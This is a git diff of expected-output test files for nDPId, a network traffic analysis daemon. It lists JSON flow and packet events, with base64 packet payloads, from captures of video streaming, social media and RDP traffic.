{"hostname":"vod-singtelhawk.quickplay.com","url":"vod-singtelhawk.quickplay.com\/seg\/vol1\/s\/Warner\/qpmezzhawkdigitalcontagion2054033featureenglish20ltrt23976fps7834192\/2015-02-02\/STV510R360\/qpmezz-Hawk_Digital_CONTAGION_2054033_FEATURE_ENGLISH_2_0_LTRT_23976fps_7834192.m2t_STV510R360-0066.ts","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 3W Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36"}} +02077{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":146,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1429000350324,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1248,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":1248,"pkt_l4_len":1212,"thread_ts_msec":1429000350324,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcBNBb\/EAArQYdm3gcIygKNqn6AFDLNbdZW8fM\/d9rUBgIIqcYAAD+T5O3IPZmBv71L8WfkixgJr\/jAt3\/6kLgAlGb+bz0ykowoo+NPkYJoM9UpoIVOvy80c0V1g1txC7AgybX1gMQCPuO2tL7\/YFSRxMejmWc4iVxTJSsqhfOA46142Bs1WbBta5O\/SisV8I6pVbO3GCxSbhFLwGr\/WZMUvJFa03S2huv7nozg+bdD4ixlKAFqDdBblAS5LqKSvj+fOg7qedCUtEMdl2BX1M92lt5m6MQhdflPtDytEcZ0QkUCdMH9OHvhlDAvSTeyAtHyfYMIr7y2wFDjfyFOM32EeqMcgEsS0MQwjTKiEkzEJ8uGfrxRfO5oVpc6VJ+xU5oxB5UzhG8pmTwc93Y2+GfYxPPy6ggTaHy\/d8I7FePvcMuO0KR+65nFfpCrRJnDXWI0WHUQIZcOwglbU1AfE\/G0U1NohfpkoAAnwPGa2AwV3oZoMhAulbVmnnznep4SXoywe87c2ocX2ggVFcYGvjslls5jM+9Mb9jAiJUQob+ptDy09gH34DekuerUkd5kD0BHNFL1qJxKuT2KFfpVgoJcv7HmFi278ssvmuhcKYTndrOnym+1tTrX4yHchzxBIO6GaHA8tKeIbQel4TL1v3Z16t\/5xrJ+Q3\/dZxmuZuNaR\/mbOEVBLzpZG7JjcrFSlppStGfqcXspmqu2LVEQvyEoz7nD3cdIKrnhCpQD85sNyvZh8JPCYo865M5+VSfDtodRJdJU1Nl6DW0MAcLqRvHQY9JW8lvPNvqOY2adRWmAKu7tqvblHXcRcfi1rVtS37DAzU+CITvUZ7K30LaIGtCPuD1JyxuUKBexT3QohOr8Lhst8RR1CzAUG3EjerjlJS4KtFHtNg7GoK88LreN47H4SdxDkAmboeyFID9kUTvhDEEqXlfFOEyBf9Hwqltx9X6rJI\/aCSw0l3eGOtTl3BrAC\/PZaQloz6cS6y\/rAG\/nTUo2JYn9FxvYyn46cJ+Dvj0skCnbuZGkNTSODQ8OYRf91rdXgsLkXz7SvGaVdHhOR9kAXFpWZO
7NlKFm7iCcjRGcikx0R+JzsCdgGKw769t40JLLZ2Q7I1fg8xfNUu24vDeA30lrnpOU4r2\/wzGdHdMyj3aW37T\/Pa6QQtQ1KDPtl9xaYHV7eAXl7B\/PrlRzNCxrvA6rIktFl32wWbaV4UONT7uV+4MsIL+HjkWP1O8dgLKVVeYmic1ZUfE8n13QHUcKgu1wZjEhZIqzgLo+waSjiNdfhALL5AB0EpMQXn5\/7OVD3m88BGmhRFUOC2MbYjnNMzH8wAwic5A3Qvz2AIrONrzFcniz\/ItQB42w6KG1uQ+E3nY7gSAkYQOrbzozKOWRZnp2uAnHe4PHe\/OVrr8C50\/kt0TKX5CZ2FJOOqCL0f72chb\/rBb5J0abgAXFRf0RhFz8NBfmLRVAS8iJvF+ExsNR3UUz7Uik5Fcuqlhq\/2+nOX6Vo3ZiRGJ8ebb8KS1vBD76QQNsXfNVIC2g\/pLfmhdq8Adxob5YnXButMrysl7iAokGOqWwh8nWfQCWcnR9MCedQ9mTBrHLXrhSeAVZOjGNYrbH8nHmLOBBy1qB3E4YD0wwrTIH9U0Sgt1"} +01056{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":147,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1429000350578,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":502,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":502,"pkt_l4_len":466,"thread_ts_msec":1429000350578,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAeaaEUAAPwZQjAo2qfp4HCMoyzUAUMz932u3WWBvUBhgH+pmAABHRVQgL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWNTEwUjM2MC9xcG1lenotSGF3a19EaWdpdGFsX0NPTlRBR0lPTl8yMDU0MDMzX0ZFQVRVUkVfRU5HTElTSF8yXzBfTFRSVF8yMzk3NmZwc183ODM0MTkyLm0ydF9TVFY1MTBSMzYwLTAwNjcudHMgSFRUUC8xLjENCkhvc3Q6IHZvZC1zaW5ndGVsaGF3ay5xdWlja3BsYXkuY29tDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgNC40LjQ7IE1JIDNXIEJ1aWxkL0tUVTg0UCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzMzLjAuMC4wIE1vYmlsZSBTYWZhcmkvNTM3LjM2DQoNCg=="} 
+00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":149,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000375190,"flow_last_seen":1429000375190,"flow_idle_time":7560000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":446,"midstream":1,"thread_ts_msec":1429000375190,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52022,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +01056{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":149,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1429000375190,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":502,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":502,"pkt_l4_len":466,"thread_ts_msec":1429000375190,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAeYAQEAAPwbqXQo2qfp4HCMoyzYAUPnxUPbwb7kUUBgByReCAABHRVQgL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWNTEwUjM2MC9xcG1lenotSGF3a19EaWdpdGFsX0NPTlRBR0lPTl8yMDU0MDMzX0ZFQVRVUkVfRU5HTElTSF8yXzBfTFRSVF8yMzk3NmZwc183ODM0MTkyLm0ydF9TVFY1MTBSMzYwLTAwNjgudHMgSFRUUC8xLjENCkhvc3Q6IHZvZC1zaW5ndGVsaGF3ay5xdWlja3BsYXkuY29tDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgNC40LjQ7IE1JIDNXIEJ1aWxkL0tUVTg0UCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzMzLjAuMC4wIE1vYmlsZSBTYWZhcmkvNTM3LjM2DQoNCg=="} 
+01150{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":149,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000375190,"flow_last_seen":1429000375190,"flow_idle_time":7560000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":446,"midstream":1,"thread_ts_msec":1429000375190,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52022,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"vod-singtelhawk.quickplay.com","url":"vod-singtelhawk.quickplay.com\/seg\/vol1\/s\/Warner\/qpmezzhawkdigitalcontagion2054033featureenglish20ltrt23976fps7834192\/2015-02-02\/STV510R360\/qpmezz-Hawk_Digital_CONTAGION_2054033_FEATURE_ENGLISH_2_0_LTRT_23976fps_7834192.m2t_STV510R360-0068.ts","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 3W Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36"}} 
+01244{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":150,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1429000378528,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":632,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":632,"pkt_l4_len":596,"thread_ts_msec":1429000378528,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAmhMQkAArAYwvXgcIygKNqn6AFDLNvB8o6L58VK0UBgIIuBYAAD6gvJK3aB9Wdi2WzDeNoMColML2KCtNfUY2CwzdFLplFssslM2yXsBjnaIJOEoejcQpeFF355YUwtgWhdMMI2rg7t6Y06MNF1+oUMraF1z7dOGYZiWEw55N0R\/C4GUApqp4yWGJ\/CM91mr7EMXR6GJMnCnweJmOE9\/g4efV5ECHsiWKrismHwHX5cBOn2yA4HpOUGRsqAyJSxdx43skOx+vp23ro8\/JrEVnLzlB\/lGV2fdWo3w6VLreno\/QTmqd4pUmkkPPriJdaoBuDGz2cVi7p0befEK6oJ\/9C0fIAdMUQBOBN698TN\/3U5eWrczQSMLB8LJ0s1VPNsG+Uk7iZbLm2h44wxC+hzTD6Om+31wmxRZkWLFty4nGoqINn64kMxZ8jk+gAnxToClxMmrRX+tVkrmxooeDNg8O2BoKHSVu0QB4ZTXmBGAzxtP6AAAUY4sOQns2cIzqTR+SY+i5krcNUfqmctlUK2HS0mekAkRZ9Fb5CIveTsXhz6bTGoR+ZwaRiShSLUWZmInPoFtYMo3SK7u+PM7bDKFUbsQjbVXKacOgHhzN29\/N7\/9u6t2jU0DoTZfnm8RO0mzmGxReSHeGiwBid9gvCA11\/mk5FbSERauRsVxeiUkx2WKBttn3weSeMdFTFGBLzM8bDgXW729KN0+91NW+r+XNzcfLAhYR8kvwcN\/mM+lqT\/pSe\/P8rPDJ\/eOsiJDbHhm2\/4+8udWjPDnsNjkEwnYrvxC7JJAG7cy2LCX7EmJxNJ1SyoFMAc="} 
+01056{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":151,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1429000378725,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":502,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":502,"pkt_l4_len":466,"thread_ts_msec":1429000378725,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAeYCSkAAPwboUwo2qfp4HCMoyzYAUPnxUrTwfKXiUBhgH8mSAABHRVQgL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWNTEwUjM2MC9xcG1lenotSGF3a19EaWdpdGFsX0NPTlRBR0lPTl8yMDU0MDMzX0ZFQVRVUkVfRU5HTElTSF8yXzBfTFRSVF8yMzk3NmZwc183ODM0MTkyLm0ydF9TVFY1MTBSMzYwLTAwNjkudHMgSFRUUC8xLjENCkhvc3Q6IHZvZC1zaW5ndGVsaGF3ay5xdWlja3BsYXkuY29tDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgNC40LjQ7IE1JIDNXIEJ1aWxkL0tUVTg0UCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzMzLjAuMC4wIE1vYmlsZSBTYWZhcmkvNTM3LjM2DQoNCg=="} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1429000030398,"flow_last_seen":1429000039635,"flow_idle_time":7560000,"flow_min_l4_payload_len":309,"flow_max_l4_payload_len":1324,"flow_tot_l4_payload_len":3136,"flow_avg_l4_payload_len":784,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.41","src_port":50668,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} 
+00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1429000030766,"flow_last_seen":1429000040059,"flow_idle_time":7560000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":3456,"flow_avg_l4_payload_len":864,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.41","src_port":50669,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1429000041481,"flow_last_seen":1429000041819,"flow_idle_time":7560000,"flow_min_l4_payload_len":181,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":464,"flow_avg_l4_payload_len":232,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"31.13.68.49","src_port":44793,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"}} +00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1429000050062,"flow_last_seen":1429000052145,"flow_idle_time":7560000,"flow_min_l4_payload_len":89,"flow_max_l4_payload_len":540,"flow_tot_l4_payload_len":1169,"flow_avg_l4_payload_len":389,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.151.160","src_port":54883,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
+00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1429000052348,"flow_last_seen":1429000052688,"flow_idle_time":7560000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":324,"flow_tot_l4_payload_len":529,"flow_avg_l4_payload_len":264,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.129.101","src_port":42761,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1429000054595,"flow_last_seen":1429000054967,"flow_idle_time":7560000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":560,"flow_tot_l4_payload_len":765,"flow_avg_l4_payload_len":382,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.129.101","src_port":42762,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"}} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1429000031075,"flow_last_seen":1429000031382,"flow_idle_time":7560000,"flow_min_l4_payload_len":53,"flow_max_l4_payload_len":302,"flow_tot_l4_payload_len":355,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.5.18","src_port":33064,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
+00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1429000037600,"flow_last_seen":1429000037659,"flow_idle_time":7560000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":266,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.26.231","src_port":33277,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1429000117728,"flow_last_seen":1429000118045,"flow_idle_time":7560000,"flow_min_l4_payload_len":582,"flow_max_l4_payload_len":775,"flow_tot_l4_payload_len":1357,"flow_avg_l4_payload_len":678,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"54.179.140.65","src_port":56381,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1429000049060,"flow_last_seen":1429000051518,"flow_idle_time":7560000,"flow_min_l4_payload_len":444,"flow_max_l4_payload_len":1096,"flow_tot_l4_payload_len":2511,"flow_avg_l4_payload_len":627,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52007,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
+00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":65,"flow_first_seen":1429000052217,"flow_last_seen":1429000153720,"flow_idle_time":7560000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":42262,"flow_avg_l4_payload_len":650,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52009,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1429000153937,"flow_last_seen":1429000207676,"flow_idle_time":7560000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":5584,"flow_avg_l4_payload_len":698,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52017,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1429000207973,"flow_last_seen":1429000236577,"flow_idle_time":7560000,"flow_min_l4_payload_len":72,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":4656,"flow_avg_l4_payload_len":665,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52018,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
+00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":25,"flow_first_seen":1429000237766,"flow_last_seen":1429000347404,"flow_idle_time":7560000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":18206,"flow_avg_l4_payload_len":728,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52019,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1429000347103,"flow_last_seen":1429000374116,"flow_idle_time":7560000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":1192,"flow_tot_l4_payload_len":2530,"flow_avg_l4_payload_len":632,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52021,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1429000375190,"flow_last_seen":1429000385363,"flow_idle_time":7560000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":3892,"flow_avg_l4_payload_len":556,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52022,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
+00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1429000031698,"flow_last_seen":1429000032158,"flow_idle_time":7560000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":470,"flow_avg_l4_payload_len":235,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"173.252.74.22","src_port":52285,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"}} +00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1429000037314,"flow_last_seen":1429000037771,"flow_idle_time":7560000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":470,"flow_avg_l4_payload_len":235,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"173.252.74.22","src_port":52288,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"}} 
+00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1429000110390,"flow_last_seen":1429000110528,"flow_idle_time":7560000,"flow_min_l4_payload_len":206,"flow_max_l4_payload_len":625,"flow_tot_l4_payload_len":831,"flow_avg_l4_payload_len":415,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.147.215","src_port":35670,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"}} +00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1429000048159,"flow_last_seen":1429000048795,"flow_idle_time":7560000,"flow_min_l4_payload_len":487,"flow_max_l4_payload_len":1169,"flow_tot_l4_payload_len":2143,"flow_avg_l4_payload_len":714,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.5.41","src_port":44256,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00563{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","packets-captured":155,"packets-processed":155,"total-skipped-flows":0,"total-l4-data-len":95867,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":21,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":21,"total-idle-flows":21,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":121,"global_ts_msec":1429000385363} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 155/155 
diff --git a/test/results/rdp.pcap.out b/test/results/rdp.pcap.out index 99678b2f1..a2cfe1af9 100644 --- a/test/results/rdp.pcap.out +++ b/test/results/rdp.pcap.out 
@@ -1,11 +1,11 @@ 00454{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"rdp.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00540{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"rdp.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1559207465138} -00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"rdp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1559207465138,"flow_last_seen":1559207465138,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1559207465138,"l3_proto":"ip4","src_ip":"172.16.2.185","dst_ip":"192.168.2.142","src_port":52494,"dst_port":3389,"l4_proto":"tcp","flow_datalink":0,"flow_max_packets":3} 
